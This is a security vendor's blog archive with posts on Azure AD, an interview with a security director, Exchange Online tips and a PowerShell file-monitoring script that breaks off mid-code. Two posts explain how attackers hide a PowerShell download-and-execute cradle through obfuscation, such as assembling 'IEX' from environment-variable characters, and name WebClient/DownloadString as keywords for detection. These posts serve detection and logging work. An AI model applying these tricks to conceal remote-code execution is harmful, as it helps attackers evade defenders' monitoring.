Category Archives: IT Pros

The Difference between Windows Server Active Directory and Azure AD

The Difference between Windows Server Active Directory and Azure AD

Once upon a time, IT pros believed that the risks of a data breach and compromised credentials were high enough to delay putting data on the cloud. After all, no organization wants to be a trending headline, announcing yet another data breach to the world. But over time with improved security, wider adoption and greater confidence, tech anxiety subsides and running cloud-based applications such as Microsoft’s subscription-based service Office 365 feels like a natural next step.

Once users start using Office 365, how do they manage AD? Windows Server AD or Azure AD? How are on-premise AD and Azure AD similar, and how are they different?

In this post, I will discuss the similarities, differences, and a few things in between.

What We Know For Sure: Windows Server Active Directory

Let’s start with what we know about Active Directory Domain Services.

First released with Windows 2000 Server edition, Active Directory is essentially a database that helps  organize your company’s users, computers and more. It provides authentication and authorization to applications, file services, printers, and other on-premises resources. It uses protocols such as Kerberos and NTLM for authentication and LDAP to query and modify items in the AD databases.

There’s also that wonderful Group Policy feature to streamline user and computer settings throughout a network.

With so many security groups, user and admin accounts, and passwords stored in Active Directory, as well as identity and access rights  managed there as well, securing AD is key to   safeguarding an organization’s assets.

Now with emails, files, CRM systems and even applications stored in the cloud, can we be as confident they’re as safe as when they were in the company’s own servers?

A Whole New World: AD Service in the Cloud?

As new startups and organizations build their companies, they most likely won’t have any on-premise data and the huge shocker is that they also won’t be creating forests and domains in AD. I’ll get more into this later.

But organizations with existing infrastructure have already made a significant investment in on-premise infrastructure and will have to visualize a new way of operationalizing their business.

Why? Azure AD will likely be a key part of Microsoft’s future. So if you’re already using any of Microsoft’s online services such as Office 365, Sharepoint Online and Exchange online, you’ll have to figure out how to navigate your way around it. And it already looks like organizations are rapidly adopting cloud-based apps and are running them nearly 50% of the time.

What’s different in Azure Active Directory?

First, you should know that Windows Server Active Directory wasn’t designed to manage web-based services.

Azure Active Directory, on the other hand, was designed to support web-based services that use REST (REpresentational State Transfer) API interfaces for Office 365, Salesforce.com etc. Unlike plain Active Directory, it uses completely different protocols (Goodbye, Kerberos and NTLM) that work with these services–protocols such as SAML and OAuth 2.0.

As I’ve pointed out earlier, with Azure AD, you won’t be creating forests and domains. Instead, you’ll be a tenant, which represents an entire organization. In fact, once you sign up for an Office 365, Sharepoint or Exchange Online, you’ll automatically be a Azure AD tenant, where you can manage all the users in the company as well as the passwords, permissions, user data, etc.

Besides seamlessly connecting to any Microsoft Online Services, Azure AD can connect to hundreds of SaaS applications using a single sign-on. This lets employees access the organization’s data without repeatedly requiring them to log in. The access token is stored locally on the employee’s device. Plus you can limit access by creating token expiration dates.

For a list on free, basic and premium features, check out this comparison chart.

Introducing Azure AD Connect

For organizations ready to migrate their on-premises structure to Azure AD, try Azure AD Connect. For a great tutorial on integration, read this how-to article.

And in an upcoming post, I’ll curate a list of top Azure AD tutorials to help you transition into a brand new interface and terminology.

With the move to Azure, we bid you farewell Kerberos, forests and domains. And flights of Microsoft angels sing thee to thy rest! 

[Transcript] Ofer Shezaf and Keeping Ahead of the Hackers

[Transcript] Ofer Shezaf and Keeping Ahead of the Hackers

This article is part of the series "[Podcast] Varonis Director of Cyber Security Ofer Shezaf". Check out the rest:

Inside Out Security: Today I’m with Ofer Shezaf, who is Varonis’s Cyber Security Director. What does that title mean? Essentially, Ofer’s here to make sure that our products help customers get the best security possible for their systems. Ofer has had a long career in data security and I might add is a graduate of Israel’s amazing Technion University.

Welcome, Ofer.

Ofer Shezaf: Thank you.

IOS: So I’d like to start off by asking you how have attackers and their techniques changed since you started in cyber security?

OS: Well, it does give away the fact that I’ve been here for a while. And the question is also an age-old question, and people will say that it’s an ever-evolving threat and some would say just the same time and time again.

My own opinion is that it’s a mixed bag. Techies would usually say that it’s all the same as usual. Actually, the technical attack vectors tend to be rather the same. So buffer overflows have been with us for probably 40 years, and SQL Injection for the last 20.

Nevertheless, everything around the technical attack vectors does change. And I think that the sophistication and the resources that the dark side is investing — it always amazes me how much it’s always increasing!

When Stuxnet appeared a few years back, targeted, you know, nuclear reactors in Iran, I thought it was just, you know, a game changer. Things will never be the same!

But today it seems to be that every political campaign tends to utilize the same techniques, so it’s amazing how much the bad guys are investing into those hacks. And that changes things.

 

IOS: Do you have any thoughts on the dark web, and now this new trend of actually buying productized malware? Do you think that is changing things?

OS: It certainly does change things. To generalize a bit, I think that the economy behind hacking has evolved a lot. It’s way more of a business and the dark web today is not a dark alley anymore. It’s more like a business arena.

And if you think about it, ransomware, which is a business model to make money out of malware, is using the same technical techniques as malware always did. But today’s dark web, the economical infrastructure of Bitcoin enables it to be a real business, which is where it becomes riskier and more frightening to an extent.

 

IOS:  At Varonis, we have obviously been focusing on … that attackers have had no problem or less problems than in the past of getting inside. And that’s basically through phishing and some other techniques.

So do you think that IT departments have adapted to this new kind of threat environment where the attacker is better able to sort of get in, you know, in through the perimeter, or they have not adapted to these kinds of threats?

OS: So I must say I meet a lot of people working in IT security. And there are some smart guys out there. So they know what it’s about — we are not blind as an industry to the new risks. That said, the hackers are successful which implies that we are missing something! Based on results, we lose.

The question why this sort of misalignment of capabilities and results, is the million-dollar question. My answer is a personal one: we don’t invest enough … I mean, it’s a nine-to-five sort of job to be an IT security, and it tends to be a lot more like policing, like physical security. We need to be into it. I coined the term for that. We need … to do continuous security, as you think the army or military or police would do.

 

IOS: We spoke a little bit before this and you had talked about I guess Security Operation Centers or SOCs. So is that something you think that should be more a part of the security environment?

OS: Yeah. I mentioned continuous security but it’s just a term, and it might be worth sort of thinking about what it actually implies for an organization. So SOCs have been around for a while, Security Operation Centers. But they tend to, well, not take it all the way.

I think that we need to have people sitting there really 24-7 even in smaller organizations because it’s becoming, you know… You have a guard at the door even in smaller organizations. So you need someone in the SOC all the time.

And they don’t need just to react. They need to be proactive.

So they need to hunt, to look for the bad guys, to do rounds around the building if you think about it in physical terms. And if we will do that, if people will invest more time, more thinking …  they’ll also feedback into a technical means which are our primary security tool today.

 

IOS: Ofer, we often see a disconnect between the executive suite and people doing data security on the ground. Maybe that’s just appearing with all the breaches in the last few years. I’m not sure. If there are one or two things you could tell the C-level about corporate data security, what would they be?

OS: So I did mention one, which is how much we invest. I think there’s under-investment and investment, at the end of the day, is in the hands of the executives.

The other thing is rather contradictory maybe but it’s important and that’s the fact that there is no total security … The only system which is entirely secure is a system which has no users and doesn’t operate. So it’s all about risk management. If it’s about risk management, it implies that we have to make choices and it also implies that we will be hacked.

And if we will be hacked, we need to make sure it’s less informed systems and we also have to make sure that we have the right plans for the day after. What will we do when we are hacked?

So things like separating systems that are important, defining what are the business critical systems, those that your stock would drop if they are hacked and those that are peripheral, and important but less.

 

IOS: So we’ve often talked about Privacy by Design on the iOS blog, but the term as you told me is actually is older. It’s really… I mean, that phraseology…that phrase is old. It really comes out of Security by Design which is more of a programming term. And that really means that developers should consider security as they’re developing, as they’re actually making the app.

I was wondering if this approach of Security by Design where we’re actually doing the security from the start will really lessen the likelihood of breaches in the coming years. Or will we need more incentives to get these applications to be more secure?

OS: So we are moving from operational security, which is after systems are put in place and then it will be protected, into designing their security upfront before we start deploying them. So it’s … the other part. I spent many years in applications security, which is right around that.

And I think that the concept of baking in security into the development process makes sense to everyone. It saves on later on because you don’t have to fix things when they’re found, and it also has the benefit of making systems more secure.

That said, it’s not a new concept. I mentioned that Security by Design is term that’s used for a decade-and-a-half. It doesn’t happen enough and the question is why? Why is Security by Design not happening as much as we would like it to be and how to make it better?

And I think that the key to that is that developers are not measured by security! They are measured by how much they output in terms of functionality. Quality is important but it’s measured in terms of failures rather than security breaches. And security is someone else’s problem so it’s not the developer problem or the developing manager problem.

As long as we don’t change that, as long as they don’t think of security as an important goal of the development process, it would be a leftover, something done that is an afterthought.

 

IOS: Well, it sounds like we may need other incentives here. And so for example, I can go to a store and buy a light bulb, and I know it has been certified by some outside agency. In the United States, it’s Underwriters Lab. There are a few others that do that.

Do you think we may see something like that, an outside certification saying that this software meets some minimal security requirements?

OS: So it goes back to compliance versus real security … I think compliance and regulations are important for market deficiencies. So when things do not work because they aren’t the right incentives, so it’s an important starting point.

That said, they are there, they’re just not providing enough. They’re also not, today, targeted specifically at the development phase, and in most cases, they are taken to be part of the operational phase, which is later on.

So it will be an interesting idea to try to create a development process for specific regulations. It’s harder because we make end-result regulations … we don’t make good software requirements!

That said, I’ve once seen an interesting demonstration. Somebody created a label for software, which is like the label you have on food, with the ingredients saying how much, you know, how much SQL injections it might have and how much cross-site scripting it might have, as you would have for sugars and fats …

 

IOS: It is quite an interesting idea! At the blog, we’ve written a lot about pen testing, and actually, we’ve also spoken to a few actual testers. You know, obviously, this is another way to deal with … improving security in an organization. I’m wondering, how do you feel about hiring these outside pen testers?

OS: So first of all, by definition, it’s the opposite of Security by Design. It usually comes in later in the game once the system is ready. So if I said I believe in security by design then pen testing seems to be less important. That said, because Security by Design doesn’t work well, pen testing is needed. It’s very much an educational phase where you bring people in, and they tell you that you didn’t do right.

Why I don’t see this as more than educational?  First, because pen testers usually are given just as much time as was allocated. You know, it’s money at the end of the day, and today the bad guys are just investing more.

It’s not a holistic way to make the software secure, it’s an … opportunistic one, and usually it gets some things, but it doesn’t get all the things … It’s good for education — would show there is an issue  — but it’s not good enough to make sure that we are really secure.

IOS: That’s right

OS: That said, it is important … Two things which are important when you do pen testing. The first one is since pen testers find just some of the issues, make sure that those are used to create a thought process around the larger challenges of the software!

So if they found a cross-site scripting in a specific place, don’t just fix this one, fix all of the cross-site scriptings … or think why your system was not built to overcome cross-site scripting in the first place. Take it [as a]  driver for security by design.

As an anecdote, I once met an organization where a pen tester came in, he found cross-site scripting. He demonstrated it by having the app popping up a “gotcha” dialogue. And two weeks later, the developers came back and said they fixed it. It doesn’t happen anymore, and what they did was just to check for the word “gotcha” in their input and block it, which is…it does happen, unfortunately!

And beyond fixing this …,it would be well if you have pen testing and they found cross-site scripting, fine, think of why your system, in the first place, was not built to handle those across the board.

The second thing that’s very important is pen testing is usually done very late in the development lifecycle. And too many times, there’s just not enough time to fix things. So making it earlier, making part of the, you know, test as models are released rather than last moment, will ensure that more can be fixed before launch … those systems are less vulnerable.

 

IOS: We also know that Microsoft has started addressing some long-standing security gaps … starting with Windows 10. There’s also a Windows 10 S, which is a Microsoft’s special security configuration for 10. I was wondering if you can tell us what 10 S is doing that may help organizations with their security.

OS: So Microsoft 10 S is the whitelisting version. If you think about security, there are two options to secure things and nearly every security system selects one. One of them is to allow everything in general and then try to block what’s dangerous, okay? An anti-virus would be a good example. Install whatever you want to install and then the anti-virus will catch it if it’s a virus.

The second option, whitelisting is always more secure, but always limits functionality more. Windows 10 S takes this approach. It limits installing software, only things that actually come from the Microsoft App Store.

So it’s way more limited, functionality speaking, sort of feels as it is less of a full system. And personally, you know, [as] an IT guy being here for quite a while, it feels too limited for me. But looking at how — you know, my kids are using computers — how, you know, general office workers are using computers, it might be just enough.

So it might be a good choice by Microsoft to create those limited versions that are secure by design because they allow just as much rather than blocking what’s wrong.

IOS: Right. If I understand what you’re saying, it would prevent, let’s say, malware from being loaded because the malware wouldn’t have been signed, so it wouldn’t have been loaded on the actual whitelist of …

OS: It’s not just signed, it’s actually downloaded from Microsoft App Store, so it’s way more … Signing exists to Windows today as it’s the next step.

IOS: So then it would really prevent anything from being…any outside software from being loaded. Okay. And … is there a performance penalty for that?

OS: As far as I know there is no performance penalty. In a way, the same… having more security in this case might actually improve security and stability because unpredicted software is also a challenge for performance and stability. The downside is functionality.

 

IOS: Right. We know from security analysts, hackers and the cybercriminals have targeted executives, they call it, you know, spear phishing or whale phishing and, you know, they have the more valuable information compared to the average employee.

So it will sort of make sense to actually target these people. I was wondering if you think that executives should receive extra security protections or they should take extra precautions in their dealings with, you know, just in their day-to-day work on the computer?

OS: So in a way, you said it all, because we do know that executives are targeted more, so we need to focus on securing them. We do it in the real world … drawing parallels with the physical security world, so it does make sense.  … A lot of our security controls are automated, and when it’s automated, if you invest in detecting that somebody is posing as the user, why stop at executives?

So my take on that would be, make the automated detection systems address any user, but then focus. It still gets to incident response team that has to assess whether it’s the risk is there and what to do. They can prioritize based on the type of the user– executives being one type of sensitive user, by the way. Of course, admins are another type.

IOS: Yeah, I mean, I could almost imagine a, I guess, like a SOC having a special section just focused on executives and perhaps looking at … any kind of notifications or alerts that come up from the, you know, the standard configuration. But actually, digging a little deeper when those things come up with the executives.

OS: Yes, if you think about it, the major challenge of a SOC is handling the flow of alerts. And any means that will enable them to be more efficient in ending alerts, focusing on those that are more critical to the business where the risk is higher, is important. Executives are a very good example.

So just pop up the alerts about the executives to the top of the list, and the analyst gets to them first and he’s doing something reasonable…He is more valuable to the organization.

In fact, so there is no 100% security! Some incidents or alerts would be left.

 

IOS: One last question. Any predictions on hacking trends in the next few years? I mean, are there new techniques on the horizon that we should be paying closer attention to?

OS: Oh, it’s a crystal ball question. It’s always hard. I’m probably wrong, but I’ll say I’ll try.

So the way to look into that, the way to try to predict is that I found out that hacking techniques usually trail changes in the IT technology. Hackers become experts in the new technology only a year or two or even more than that after the technology becomes widespread. In this respect, I think that mobile is the next front.

We all use mobile, but actually, business uses  mobile  … which is  rather new, Salesforce Mobile App. In the last of couple years, we can actually do more work on the mobile device, which means it’s a good target for malware. And I think we’ve seen malware for any mobile, but we still didn’t see financial or enterprise malware as ransom or for mobile, for example, and that will be coming.

IOS: And what about Internet of Things — it is kind of somewhat related to mobile — as a new trend? Are we starting to see some of that?

OS: Yes, it’s an area where we’ve seen two things. First of all, a lot of research, which always comes before actual real-world use. If you look at what researchers are doing today, you know what hackers will do in two or three years!

And after today, we’ve seen mostly a denial-of-service attacks against, you know, Internet of Things devices where they were … taken off the network.

It would be interesting — it would be frightening actually — once the bad guys start to do more innovative damage by taking over devices. You know, cars are a very frightening example, of course, traffic lights, electricity controllers, etc.

That said, the business model is the driving factor. And I still don’t see — unlike, for example, malware for mobile or a malware over on cloud systems — the business model, apart from nation states, around the Internet of Things.

IOS: It’s interesting! So, Ofer, thank you for joining us. This was a really fascinating discussion, and it’s good to get this perspective from someone who’s been in the business for such a long time.

OS: Thank you. My pleasure as well.

PowerShell Obfuscation: Stealth Through Confusion, Part II

PowerShell Obfuscation: Stealth Through Confusion, Part II

This article is part of the series "PowerShell Obfuscation". Check out the rest:

Let’s step back a little from the last post’s exercise in jumbling PowerShell commands. Obfuscating code as a technique to avoid detection by malware and virus scanners (or prevent reverse engineering) is nothing really new. If we go back into the historical records, there’s this (written in Perl).  What’s the big deal, then?

The key change is that hackers can go malware-free by using garden variety PowerShell in practically all phases of an attack. And through obfuscation, this PowerShell-ware then effectively has an invisibility cloak.  And we all know that cloaking devices can give one side a major advantage!

IT security groups have to deal with this new threat.

Windows PowerShell Logging Is Pretty Good!

As it turns out, I was little too quick in my review last time of PowerShell’s logging capabilities, which are enabled in Group Policy Management. I showed an example where I downloaded and executed a PowerShell cmdlet from a remote website:

I was under the impression that PowerShell logging would not show the evil malware embedded in the string that’s downloaded from the web site.

I was mistaken.

If you turn on the PowerShell module logging through GPM, then indeed the remote PowerShell code appears in the log. To refresh memories, I was using PowerShell version 4 and (I believe) the latest Windows Management Framework (WMF), which is supposed to support the more granular logging.

Better PowerShell logging can be enabled in GPM!

It’s a minor point, but it just means that the attackers would obfuscate the initial payload as well.

I was also mistaken in thinking that the obfuscations provided by Invoke-Obfuscation would not appear de-obfuscated in the log. For example, in the last post I tried one of the string obfuscations to produce this:

Essentially, it’s just a concatenation of separate strings that’s assembled together at run-time to form a cmdlet.

For this post, I sampled more of Invoke-Obfuscation’s scrambling options to see how the commandline appears in the Event log.

I tried its string re-order option (below), which takes advantage of some neat tricks in PowerShell.

Notice that first part $env:comspec[4,15,25]? It takes the environment variable $env:comspec and pulls out the 4-, 15-, and 25-th characters to generate “IEX”, the PowerShell alias for Invoke-Expression. The joinoperator takes the array and converts it to a string.

The next part of this PowerShell expression uses the format operator f. If you’ve worked with sprintf-like commands as a programmer, you’ll immediately recognize these capabilities. However, with PowerShell, you can specify the element position in the parameter list that gets pulled in to create the resulting string. So {20}, {5}, {9}, {2} starts assembling yet another Invoke_Expression cmdlet.

Yes, this gets complicated very quickly!

I also let Invoke-Obfuscation select a la carte from its obfuscation menu, and it came up with the following mess:

After trying all these, I checked the Event Viewer to see that with the more powerful logging capabilities now enabled, Windows could  see through the fog, and capture the underlying PowerShell:

Heavily obfuscated, but with PowerShell Module logging enabled the underlying cmdlets are available in the log.

Does this mean that PowerShell obfuscation always gets de-obfuscated in the Window Event log, thereby allowing malware detectors to use traditional pattern matching?

The answer is no!

Invoke-Obfuscation also lets you encode PowerShell scripts into raw ASCII, Hex, and, yes, even Binary. And this encoding obfuscation seems to foil the event logging:

The underlying cmdlet represented by this Hex obfuscation was not detected.

Quantifying Confusion

It appears at this point the attackers have the advantage: a cloaking device that lets their scripts appear invisible to defenders or at least makes them very fuzzy.

The talk given at Black Hat that I referenced in the first post also introduced work done by Microsoft’s Lee Holmes – yeah, that guy —  in detecting obfuscated malware using probabilistic models and machine learning techniques.

If you’re interested you can look at the paper they presented at the conference. Holmes borrowed techniques from natural language processing to analyze character frequency of obfuscated PowerShell scripts versus the benign varieties. There are differences!

Those dribbles below the main trend show that obfuscated PowerShell has a different character frequency than standard scripts.

In any case, Holmes moved to a more complicate logistical regression model – basically classifying PowerShell code into either evil obfuscated or normal scripts. He then trained his logit by looking deep into PowerShell’s parsing of commands – gathering stats for levels of nesting, etc. – to come up with a respectable classifier with an accuracy of about 96%. Not by any means perfect, but a good start!

A Few More Thoughts

While I give a hat tip to Microsoft for improving their PowerShell logging game, there are still enough holes for attackers to get their scripts run without being detected. And this assumes that IT groups know to enable PowerShell Module logging in the first place!

Lee Holmes machine learning model suggests that it’s possible to  detect these stealthy scripts in the wild.

However, this means we’re back into the business of scanning for malware, and we know that this approach ultimately falls short. You can’t keep up with the attackers who are always changing and adjusting their code to fool the detectors.

Where is this leading? Of course, you turn on PowerShell logging as needed and try to keep your scanning software up to date, but in the end you need to have a solid secondary defense, one based on looking for post-exploitation activities involving file accesses of your sensitive data.

Catch what PowerShell log scanners miss! Request a demo today.

3 Tips to Monitor and Secure Exchange Online

3 Tips to Monitor and Secure Exchange Online

Even if you don’t have your sights on the highest office in the country, keeping a tight leash on your emails is now more important than ever.

Email is commonly targeted by hackers as a method of entry into organizations. No matter if your email is hosted by a 3rd party or managed internally, it is imperative to monitor and secure those systems.

Microsoft Exchange Online – part of Microsoft’s Office365 cloud offering – is just like Exchange on-prem but you don’t have to deal with the servers. Microsoft provides some tools and reports to assist securing and monitoring of Exchange Online like encryption and archival, but it doesn’t cover all the things that keep you up at night like:

  • What happens when a hacker gains access as an owner to an account?
  • What happens if a hacker elevates permissions and makes themselves owner of the CEO’s email?
  • What happens when the hackers have access to make changes to the O365 environment, will you notice?

These questions are exactly what prompted us to develop our layered security approach – which Andy does a great job explaining the major principles of here. What happens when the bad people get in – and they have the ability to change and move around the system? At the end of the day, Exchange Online is another system that provides an attack vector for hackers.

Applying these same principles to Exchange Online, we can extrapolate the following to implement monitoring and security for your email in the cloud:

  1. Lock down access: Make sure only the correct people are owners of mailboxes, and limit access make changes to permissions or 0365 to a small group of administrators.
  2. Manage user access: Archive and delete inactive users immediately. Inactive users are an easy target for hackers as they are usually able to use those accounts without being noticed.
  3. Monitor behavior: Implement a User Based Analytics (UBA) system on top of your email monitoring. Being able to spot abnormal behavior (ie an account being promoted to owner of the CEO’s email folder, another forwarding thousands of emails to the same email address) early is the key to stopping a hacker in hours or days instead of weeks or months.

Wondering if there’s a good solution to help monitor your Exchange Online? Well, we’ve got you covered there too.

PowerShell Obfuscation: Stealth Through Confusion, Part I

PowerShell Obfuscation: Stealth Through Confusion, Part I

This article is part of the series "PowerShell Obfuscation". Check out the rest:

To get into the spirit of this post, you should probably skim through the first few slides of this presentation by Daniel Bohannon and Le Holmes given at Black Hat 2017. Who would have thunk that making PowerShell commands look unreadable would require a triple-digit slide deck?

We know PowerShell is the go to-tool for post-exploitation, allowing attackers to live off the land and prosper. Check out our pen testing Active Directory series for more proof.

However, IT security is, in theory monitoring user activities at, say,  the Security Op. Center or SoC, so it should be easy to spot when a “non-normal” command is being executed.

In fact, we know that one tipoff of a PowerShell attack is when a user creates a  WebClient object,  calls its Downloadstring method, and then executes the string contained in the remote web page. Something like the following:

Why would an ordinary user or even for that matter an admin do this?

While this “clear text” is easy to detect by looking at the right logs in Windows and scanning for the appropriate keywords, the obfuscated version is anything but. At the end of this post, we’ll show how this basic “launch cradle” used by hackers can be made to look a complete undecipherable word jumble.

PowerShell Logging    

Before we take our initial dive into obfuscation, let’s explore how events actually gets logged by Windows, specifically for PowerShell. Once you see the logs, you’ll get a greater appreciation of what hackers are trying to hide.

To their credit, Microsoft has realized the threat possibilities in PowerShell and started improving command logging in Windows 7. You see these improvements in PowerShell versions 4 and 5.

In my own AWS environment, the Windows Server 2012 I used came equipped with version 4. It seems to have most of the advanced logging capabilities — though 5 has the latest and greatest.

From what I was able to grok reading Bohannon’s great presentation and a few other Microsoft sources, you need to enable event 4688 (process creation) and then  turn on auditing for the  PowerShell command line. You can read more about it in this Microsoft document.

And then for even more voluminous logging,  you can set policies in the GPO console to enable, for example, full transcription logging of a PowerShell (below).

More PowerShell logging features in the Administrate Template under Computer Configuration.

No, I didn’t do that for my own testing! I discovered (as many other security pros have) that when using the Windows Event Viewer  things get confusing very quickly. I don’t need the full power of transcription logging.

For kicks I ran a simple pipeline — Get-Process | %{Write-Host $_.Handles}— to print out process handles, and generated … an astonishing 114 events in the PowerShell log. Ofer, by the way, has a good post explaining the larger problem of correlating separate events to understand the full picture.

Got it! The original pipeline that spewed off lots of related events.

The good news is that from the Event Viewer,  I was able to see the base command line that triggered the event cascade (above).

Release the Confusion

The goal of the attacker is to make it very difficult or impossible for security staff viewing the log to detect obvious hacking activity or, more likely, fool analytics software to not trigger when malware is loaded.

In the aforementioned presentation, there’s a long, involved example, showing how to obfuscate malware by exploiting PowerShell’s ability to execute commands embedded in a string.

Did you know this was possible?

Or, at a more evil level, this:

Or take a look at this, which I cooked up based on my own recipe:

Yeah, PowerShell is incredibly flexible and the hackers are good at taking advantage of its features to create confusion.

You can also ponder this one, which uses environment variables in an old-fashioned Windows shell to hide the evil code and then pipe it into PowerShell:

You should keep in mind that in a PowerShell pipeline, each pipe segment runs as a separate process, which spews its own events for maximum log confusion. The goal in the above example is to use the %cmd% variable to hide the evil code.

However, from my Windows Event Viewer,  I was able to spot the full original command line — though it took some digging.

In theory, you could look for the actual malware signature, which in my example is  represented by “write-host evil malware”, within the Windows logs by scanning the command lines.

But hackers became very clever by making the malware signature itself invisible. That’s really the example I first started with.

The idea is to use the WebClient .Net object to read the malware that’s contained on a remote site and then execute it with PowerShell’s Invoke-Expression. In the Event Viewer, you can’t see the actual code!

This is known as fileless malware and has become very popular technique among the hackeratti. As I mentioned in the beginning, security pros can counteract this by looking instead for WebClient and Downloadstring in the command line. It’s just not a normal user command, at least in my book.

A Quick Peek at Invoke-Obfuscation

This is where Bohannon’s Invoke-Obfuscation tool comes into play. He spent a year exploring all kinds of PowerShell command line obfuscation techniques — and he’s got the beard to prove it! —to make it almost impossible to scan for obvious keywords.

His obfuscations are based on escape sequences and clever PowerShell programming to manipulate commands.

I loaded his Invoke-Expression app into my AWS server and tried it out for myself. We’ll explore more of this tool next time, but here’s what happened when I gave it the above Webclient.Downloadstring fileless command string:

Invoke-Obfuscation’s string obfuscation. Hard to search for malware signatures within this jumble.

Very confusing! And I was able to test the obfuscated PowerShell within his app.

Next time we’ll look at more of Invoke-Obfuscation’s powers and touch on new ways to spot these confusing, but highly dangerous, PowerShell scripts.

Continue reading the next post in "PowerShell Obfuscation"

[Podcast] Varonis Director of Cyber Security Ofer Shezaf, Part I

[Podcast] Varonis Director of Cyber Security Ofer Shezaf, Part I

This article is part of the series "[Podcast] Varonis Director of Cyber Security Ofer Shezaf". Check out the rest:

Leave a review for our podcast & we'll send you a pack of infosec cards.


A self-described all-around security guy, Ofer Shezaf is in charge of security standards for Varonis products. He has had a long career that includes most recently a stint at Hewlett-Packard, where he was a product manager for their SIEM software, known as ArcSight. Ofer is a graduate of Israel’s Technion University.

It’s always great to talk to Ofer on data security since his perspective is shaped by a 20-year career. He’s seen it all! In the first part of our interview, we learn how hackers have taken long-standing techniques such as SQL injection and built successful business models around their malware.

Can they be stopped? Ofer thinks we’ll first need to have new metrics and measurements describing the security of developed software. Click on the interview above to hear more about what he has to say.

Continue reading the next post in "[Podcast] Varonis Director of Cyber Security Ofer Shezaf"

Practical PowerShell for IT Security, Part V: Security Scripting Platform ...

Practical PowerShell for IT Security, Part V: Security Scripting Platform Gets a Makeover

A few months ago, I began a mission to prove that PowerShell can be used as a security monitoring tool. I left off with this post, which had PowerShell code to collect file system events, perform some basic analysis, and then present the results in graphical format. My Security Scripting Platform (SSP) may not be a minimally viable product, but it was, I think, useful as simple monitoring tool for a single file directory.

After finishing the project, I knew there were areas for improvement. The event handling was clunky, the passing of information between various parts of the SSP platform was anything but straightforward, and the information being displayed using the very primitive Out-GridViewwas really a glorified table.

New and Improved

I took up the challenge of making SSP a bit more viable. My first task was to streamline event handling. I had initially worked it out so that file event messages were picked up by a handler in my Register-EngineEvent scriptblock and sent to an internal queue and then finally forwarded to the main piece of code, the classification software.

I regained my sanity, and realized I could just directly forward the messages with Register-EngineEvent -forward from within the event handling scriptblock, removing an unnecessary layer of queuing craziness.

You can see the meaner, leaner version below.

#Count events, detect bursts, forward to main interface

$cur = Get-Date
$Global:Count=0
$Global:baseline = @{"Monday" = @(1,1,1); "Tuesday" = @(1,.5,1);"Wednesday" = @(4,4,4);"Thursday" = @(7,12,4); "Friday" = @(5,4,6); "Saturday"=@(2,1,1); "Sunday"= @(2,4,2)}
$Global:cnts =     @(0,0,0)
$Global:burst =    $false
$Global:evarray =  New-Object System.Collections.ArrayList

$action = { 
    $Global:Count++  
    $d=(Get-Date).DayofWeek
    $i= [math]::floor((Get-Date).Hour/8) 

   $Global:cnts[$i]++ 
   

   #event auditing!
    
   $rawtime =  $EventArgs.NewEvent.TargetInstance.LastAccessed.Substring(8,6)
   $filename = $EventArgs.NewEvent.TargetInstance.Name
   $etime= [datetime]::ParseExact($rawtime,"HHmmss",$null)
  

   $msg="$($etime)): Access of file $($filename)"
   $msg|Out-File C:\Users\Administrator\Documents\events.log -Append
  
   New-Event -SourceIdentifier Delta -MessageData "Access" -EventArguments $filename  #notify 
   
   $Global:evarray.Add(@($filename,$etime))
   if(!$Global:burst) {
      $Global:start=$etime
      $Global:burst=$true            
   }
   else { 
     if($Global:start.AddMinutes(15) -gt $etime ) { 
        $Global:Count++
        #File behavior analytics
        $sfactor=2*[math]::sqrt( $Global:baseline["$($d)"][$i])
       
        if ($Global:Count -gt $Global:baseline["$($d)"][$i] + 2*$sfactor) {  #at 95% level of poisson
         
         
          "$($etime): Burst of $($Global:Count) accesses"| Out-File C:\Users\Administrator\Documents\events.log -Append 
          $Global:Count=0
          $Global:burst =$false
          New-Event -SourceIdentifier Delta -MessageData "Burst" -EventArguments $Global:evarray #notify on burst
          
          $Global:evarray= [System.Collections.ArrayList] @()
        }
     }
     else { $Global:burst =$false; $Global:Count=0; $Global:evarray= [System.Collections.ArrayList]  @()}
   }     
} 

Register-EngineEvent -SourceIdentifier Delta -Forward 
Register-WmiEvent -Query "SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance ISA 'CIM_DataFile' and TargetInstance.Path = '\\Users\\Administrator\\' and targetInstance.Drive = 'C:' and (targetInstance.Extension = 'txt' or targetInstance.Extension = 'doc' or targetInstance.Extension = 'rtf') and targetInstance.LastAccessed > '$($cur)' " -sourceIdentifier "Accessor" -Action $action   
Write-Host "starting engine ..."

while ($true) {

   Wait-Event -SourceIdentifier Access # just hang on this so I don't exit    
  
}

 

Then I took on the main piece of code, where I classify files based on whether they have social security numbers and other sensitive keywords. As events come in from the handler, the file reclassification is triggered. This code then periodically displays some of the results of the classification.

In this latest version, I removed the “real-time” classification and focused on cleaning up the PowerShell code and improving the graphics — more on that below.

I took a wrong turn in the original version by relying on a PowerShell data locking module to synchronize data access from concurrent tasks, which I used for some of the grunt work. On further testing, the freebie module that implements the Lock-Object cmdlet didn’t seem to work.

As every junior system programmer knows, it’s easier to synchronize with messages than with low-level locks. I reworked the code to take the messages from the event handler above, and send them directly to a main message processing loop. In short: I was able to deal with asynchronous events in a synchronous manner.

.Net Framework Charts and PowerShell

My great discovery in the last month was that I could embed Microsoft-style charts inside PowerShell. In other word, the bar, line, scatter and other charts that are available in Excel and Word can be controlled programmatically in PowerShell. As a newbie PowerShell programmer, this was exciting to me. You can read more about .Net Framework Controls in this post.

It’s a great idea, and it meant I could also replace the messy Out-GridViewcode.

But the problem, I quickly learned, is that you also have to deal with some of the interactive programming involved with Microsoft forms. I just wanted to display my .Net charts while not having to code the low-level details. Is there a lazy way out?

After much struggle, I came to see that the easiest way to do this is to launch each chart in its own runspace as a separate task. (Nerd Note: this is how I avoided coding message handling for all the charts since each runs separately as modal dialogs.)

I also benefited from this freebie PowerShell module that wraps the messy .Net chart controls. Thanks Marius!

I already had set up a tasking system earlier to scan and classify each file in the directory I was monitoring, so it was just a matter of reusing this tasking code to launch graphs.

I created a pie chart for showing relative concentration of sensitive data, a bar chart for a breakdown of files by sensitive data types, and, the one I’m most proud is a classic event stair-step chart for file access burst conditions — a possible sign of an attack.

My amazing dashboard. Not bad for PowerShell with .Net charts.

For those who are curious about the main chunk of code doing all the work of my SSP, here it is for your entertainment:

 
$scan = {  #file content scanner
$name=$args[0]
function scan {
   Param (
      [parameter(position=1)]
      [string] $Name
   )
      $classify =@{"Top Secret"=[regex]'[tT]op [sS]ecret'; "Sensitive"=[regex]'([Cc]onfidential)|([sS]nowflake)'; "Numbers"=[regex]'[0-9]{3}-[0-9]{2}-[0-9]{3}' }
     
